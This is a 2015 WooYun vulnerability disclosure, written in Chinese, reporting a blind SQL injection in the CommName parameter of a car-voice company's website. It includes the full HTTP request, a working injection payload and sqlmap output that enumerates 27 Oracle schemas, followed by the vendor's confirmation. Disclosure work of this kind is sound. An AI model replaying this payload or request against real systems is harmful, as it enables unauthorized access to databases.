当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123476

漏洞标题:车音网SQL注入四(27库)

相关厂商:深圳市车音网科技有限公司

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-29 16:19

修复时间:2015-08-13 17:50

公开时间:2015-08-13 17:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

天地本不仁 万物为刍狗
【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

POST数据包:

POST /comm/commlistpbl?time=1435561511290 HTTP/1.1
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://hui.vcyber.com:80/
Cookie: ASP.NET_SessionId=myimwlbtpmr1hey2dttswv55; Hm_lvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561512,1435561541; Hm_lpvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561541; HMACCOUNT=BF8F36E9E6A2F87A
Host: hui.vcyber.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
CommName=-1&CommTypeID=&IYN=&PageNums=1&sellPrice=&TJType=&ZCount=


参数 CommName 未过滤 导致了本次注入

0.png


由于这个注入点 数据跑起来很慢 所以就不继续了

POST parameter 'CommName' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 81 HTTP(s) requ
ests:
---
Parameter: CommName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CommName=-1%' AND 1404=1404 AND '%'='&CommTypeID=&IYN=&PageNums=1&s
ellPrice=&TJType=&ZCount=
---
[15:33:16] [INFO] testing MySQL
[15:33:16] [WARNING] the back-end DBMS is not MySQL
[15:33:16] [INFO] testing Oracle
[15:33:18] [INFO] confirming Oracle
[15:33:25] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[15:33:25] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[15:33:25] [INFO] fetching database (schema) names
[15:33:25] [INFO] fetching number of databases
[15:33:25] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:33:25] [INFO] retrieved: 27
[15:34:21] [INFO] retrieved: A
[15:35:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
PEX_03020
[15:38:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
0
[15:39:24] [INFO] retrieved: APPQO


漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-29 17:48

厂商回复:

感谢

最新状态:

暂无